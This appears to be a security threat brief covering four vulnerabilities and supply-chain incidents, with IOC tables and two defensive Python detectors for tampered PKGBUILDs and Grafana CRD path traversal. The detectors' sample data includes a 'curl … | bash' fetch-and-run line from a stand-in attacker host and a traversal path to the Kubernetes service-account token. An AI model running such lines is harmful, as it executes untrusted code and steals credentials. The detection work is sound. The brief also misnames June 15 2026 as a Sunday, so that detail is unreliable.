Cyber Threat Brief — June 15 2026
1. UpdraftPlus Auth Bypass to RCE — CVE-2026-10795
TL;DR: Unauthenticated auth bypass in UpdraftPlus (<= 1.26.4) lets attackers forge admin RPC commands and upload malicious plugins for RCE. ~5,000 attacks blocked daily across 3M+ active installations.
What’s New:
- Signature verification bypass via crafted message format collapses encryption key to predictable all-zero value
- Forged UpdraftCentral RPC commands execute as the connected admin — plugin upload → shell
- Wordfence blocked ~5,000 exploitation attempts in a single day (June 14 data)
- Public PoC on GitHub (izxci/CVE-2026-10795)
- Fixed in UpdraftPlus 1.26.5 (released June 3)
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| POST /wp-admin/admin-ajax.php with action=updraft_central_localkeys_* | URI pattern | T1190 | WAF / access logs | Block unauthenticated requests to UpdraftCentral endpoints |
| Malicious plugin upload via udrpc handler | Behavior | T1505.004 | WordPress audit log | Alert on plugin install without admin session |
| izxci/CVE-2026-10795 PoC payload patterns | Exploit code | T1190 | IDS/IPS | Deploy signature for forged RPC message format |
| New admin user creation post-exploit | Behavior | T1136.001 | WordPress user table / WP-CLI | Hunt for unexpected admin accounts |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No UpdraftPlus-specific rule; need WAF/proxy detection for updraft_central AJAX actions |
| Elastic | None | No coverage; generic webshell rules may catch post-exploitation |
| Sigma | None | No rule; community contribution needed for WordPress RPC abuse pattern |
Sources: SecurityOnline | Threat-Modeling.com Advisory | GitHub PoC
2. Arch Linux AUR “Atomic Arch” Supply Chain — eBPF Rootkit + Rust Infostealer
TL;DR: Threat actors hijacked 400+ orphaned AUR packages (expanded to 1,500+ in second wave) to deliver a Rust infostealer and eBPF rootkit via modified PKGBUILD files. Official Arch repos unaffected.
What’s New:
- Attackers claimed orphaned AUR packages via standard adoption process, modified PKGBUILDs
- First wave: 408 packages (June 11); second wave: 1,500+ packages (June 12)
- Rust-based infostealer exfiltrates credentials and tokens
- eBPF rootkit hooks getdents64 to hide systemd service files from ls
- Sonatype tracking as Sonatype-2026-003775 (CVSS 8.7)
- Community detection tool: lenucksi/aur-malware-check on GitHub
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Modified PKGBUILD files with external fetch URLs | Supply chain | T1195.001 | Package build logs | Audit all AUR packages built since June 10 |
| eBPF programs hooking getdents64 syscall | Rootkit behavior | T1014 | bpftool prog list / auditd | Hunt for unexpected eBPF programs on Arch systems |
| Systemd service files hidden by rootkit | Persistence | T1543.002 | find /etc/systemd/system (bypass ls) | Use find not ls to enumerate services |
| Rust binary credential stealer | Malware | T1555 | EDR / process monitoring | Alert on unknown Rust binaries spawned from makepkg |
| lenucksi/aur-malware-check | Detection tool | — | — | Run against all Arch/AUR systems |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Linux AUR/package manager abuse detection |
| Elastic | Linux Suspicious eBPF Program Load (generic) | Need specific rule for rootkit-style getdents64 hooks |
| Sigma | None | Community tool available but no Sigma rule for PKGBUILD tampering |
Sources: BleepingComputer | The Hacker News | GitHub Detection Tool
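A PKGBUILD audit helper for the "modified PKGBUILD files with external fetch URLs" artifact above, written here as an added example and not the brief's, Arch's, or the lenucksi/aur-malware-check tool's code. It pulls download hosts out of source=() arrays and flags inline curl/wget fetches inside build functions, comparing hosts against an allowlist you supply; the sample PKGBUILD, package name and URLs are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed PKGBUILD fragment modelled on the tampering pattern in the brief:
# a legitimate upstream tarball plus an attacker-controlled second source and a
# stage-2 download in prepare(). Package name and hosts are hypothetical.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/example-tool/archive/v$pkgver.tar.gz"
        "https://cdn.example-attacker.invalid/helper.sh")
sha256sums=('SKIP' 'SKIP')
prepare() {
  curl -fsSL https://cdn.example-attacker.invalid/stage2 | bash
}
build() {
  cd "$pkgname-$pkgver"
  cargo build --release
}
"""

# source=() and arch-specific source_x86_64=() arrays, possibly spanning lines.
SOURCE_RE = re.compile(r"^\s*source(?:_\w+)?=\((.*?)\)", re.S | re.M)
# curl/wget invocations that pull from an http(s) URL anywhere in the script body.
INLINE_FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^\n|;&]*?(https?://\S+)")


def source_urls(pkgbuild: str) -> list[str]:
    """Extract download URLs from source arrays, stripping the optional 'name::' prefix."""
    urls = []
    for block in SOURCE_RE.findall(pkgbuild):
        for quoted, bare in re.findall(r"[\"']([^\"']+)[\"']|(\S+)", block):
            entry = quoted or bare
            url = entry.split("::", 1)[1] if "::" in entry else entry
            if "://" in url:  # local files (patches, .desktop) carry no scheme
                urls.append(url)
    return urls


def audit_pkgbuild(pkgbuild: str, trusted_hosts: set[str]) -> list[str]:
    """Return findings: source URLs on hosts outside the allowlist, then inline fetches."""
    findings = []
    for url in source_urls(pkgbuild):
        host = urlparse(url).hostname or ""
        if host not in trusted_hosts:
            findings.append(f"untrusted source host: {host} ({url})")
    for url in INLINE_FETCH_RE.findall(pkgbuild):
        findings.append(f"inline network fetch in build step: {url}")
    return findings
```

Run it over every PKGBUILD under your makepkg build directories and review any package that produces findings rather than rebuilding it blindly.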
3. Grafana Operator K8s Privilege Escalation — CVE-2026-11769
TL;DR: Critical path traversal in Grafana Operator (<= 5.23) lets any user who can create Dashboard or LibraryPanel CRDs steal the operator’s Kubernetes service account token and escalate privileges cluster-wide.
What’s New:
- Jsonnet evaluation in operator manager pod allows path traversal to read SA token
- Operator runs with elevated cluster RBAC — token theft = cluster compromise
- Disclosed June 13, fixed in Grafana Operator 5.24.0
- No ITW exploitation confirmed yet, but trivial to exploit with CRD create permissions
- Widely deployed in K8s observability stacks
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Dashboard/LibraryPanel CRDs with jsonnet import traversal paths | Exploit payload | T1552.007 | K8s audit log | Alert on CRD creates with ../ in jsonnet expressions |
| Grafana Operator SA token access from non-operator pods | Token theft | T1528 | K8s audit log | Monitor SA token usage from unexpected source IPs/pods |
| Grafana Operator versions <= 5.23 | Vulnerable software | — | Asset inventory | Upgrade to 5.24.0 |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No K8s operator-specific path traversal rules |
| Elastic | Kubernetes Suspicious API Request (generic) | Need specific rule for CRD-based path traversal |
| Sigma | None | No coverage for Grafana Operator abuse |
Sources: Grafana Operator v5.24.0 Release | CVE-2026-11769 Details
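Detection logic for the K8s audit-log artifact above, added here as an example that is not from the brief, the Grafana Operator project, or the cited sources. It assumes the operator's CRDs sit in the grafana.integreatly.org API group as grafanadashboards / grafanalibrarypanels with the raw Jsonnet in spec.jsonnet (taken from the upstream project; confirm against the CRDs installed in your cluster), that audit logging runs at Request or RequestResponse level so requestObject is recorded, and it goes slightly beyond the table by also flagging absolute import paths.

```python
import json
import re

# Assumed Grafana Operator API group and CRD resource names; verify against your cluster.
GRAFANA_GROUP = "grafana.integreatly.org"
WATCHED_RESOURCES = {"grafanadashboards", "grafanalibrarypanels"}
# Jsonnet import / importstr / importbin with a quoted path argument.
IMPORT_RE = re.compile(r"\bimport(?:str|bin)?\s*['\"]([^'\"]+)['\"]")


def traversal_imports(jsonnet: str) -> list[str]:
    """Import paths that climb with a '..' segment or are absolute; both can reach files outside the dashboard tree."""
    return [p for p in IMPORT_RE.findall(jsonnet) if ".." in p.split("/") or p.startswith("/")]


def find_traversal_crds(audit_log: str) -> list[dict]:
    """Scan JSON-lines K8s audit events for Grafana CRD writes whose Jsonnet imports traverse paths."""
    alerts = []
    for line in audit_log.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ref = ev.get("objectRef", {})
        if ev.get("verb") not in {"create", "update", "patch"}:
            continue
        if ref.get("apiGroup") != GRAFANA_GROUP or ref.get("resource") not in WATCHED_RESOURCES:
            continue
        # requestObject is only present at Request/RequestResponse audit level.
        jsonnet = ev.get("requestObject", {}).get("spec", {}).get("jsonnet", "")
        hits = traversal_imports(jsonnet)
        if hits:
            alerts.append({"user": ev.get("user", {}).get("username"), "namespace": ref.get("namespace"),
                           "resource": ref.get("resource"), "name": ref.get("name"), "imports": hits})
    return alerts


# Constructed audit events (not real cluster data): a benign dashboard, an unrelated pod
# create, and a dashboard whose importstr walks up to the operator's mounted SA token.
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {"verb": "create", "user": {"username": "platform-team"},
     "objectRef": {"apiGroup": GRAFANA_GROUP, "resource": "grafanadashboards", "namespace": "monitoring", "name": "nodes"},
     "requestObject": {"spec": {"jsonnet": "local g = import 'lib/grafonnet.libsonnet'; g.dashboard.new('nodes')"}}},
    {"verb": "create", "user": {"username": "dev-user"},
     "objectRef": {"apiGroup": "", "resource": "pods", "namespace": "dev", "name": "test"},
     "requestObject": {"spec": {"containers": []}}},
    {"verb": "create", "user": {"username": "dev-user"},
     "objectRef": {"apiGroup": GRAFANA_GROUP, "resource": "grafanadashboards", "namespace": "dev", "name": "oops"},
     "requestObject": {"spec": {"jsonnet": "{ token: importstr '../../../../var/run/secrets/kubernetes.io/serviceaccount/token' }"}}},
])
```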
4. ITScape KVM Guest-to-Host Escape — CVE-2026-46316
TL;DR: First KVM/arm64 guest-to-host escape — race condition in vGIC-ITS emulation gives a guest VM kernel-level code execution on the host. PoC public. Critical for ARM64 cloud providers.
What’s New:
- Race condition in in-kernel vGIC-ITS (Interrupt Translation Service) emulation
- Exploits kernel directly (not QEMU), yielding host kernel compromise
- Researcher V4bel (Hyunwoo Kim) published PoC on GitHub (V4bel/ITScape)
- Affects Linux kernels from April 2024 through early June 2026
- Fixed in commit 13031fb6b835; most distros have patches available
- No confirmed ITW exploitation yet, but adaptable for multi-tenant cloud attacks
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| KVM vGIC-ITS race condition exploitation | VM escape | T1611 | Host kernel logs / dmesg | Monitor for unexpected KVM error messages on arm64 hosts |
| V4bel/ITScape PoC | Exploit code | T1611 | Threat intel | Patch arm64 KVM hosts immediately |
| Kernel versions pre-13031fb6b835 on arm64 | Vulnerable software | — | Asset inventory | Identify and patch all arm64 KVM hypervisors |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No KVM escape detection rules |
| Elastic | None | No arm64 KVM-specific detection |
| Sigma | None | No coverage; need rule for anomalous KVM ITS behavior |
Sources: CybersecurityNews | GitHub PoC | SecurityOnline
Status Updates
- CVE-2026-10520 (Ivanti Sentry): CISA KEV deadline passed yesterday June 14. Post-patch exploitation attempts ongoing per Shadowserver. At least 2 of 19 monitored instances confirmed backdoored. Original brief.
- CVE-2026-35273 (Oracle PeopleSoft): CISA KEV deadline TODAY June 15 (Sunday). ShinyHunters/UNC6240 exploitation ongoing. Rare weekend BOD 26-04 deadline. Original brief.
- CVE-2026-47281 (RoguePlanet — Windows Defender): Still UNPATCHED zero-day. Defender definition 1.453.20.0 detects PoC but does not fix root cause. Original brief.
- CVE-2026-20253 (Splunk Enterprise PostgreSQL Sidecar): PoC public, no ITW exploitation. Patch to 10.2.4/10.0.7+. Original brief.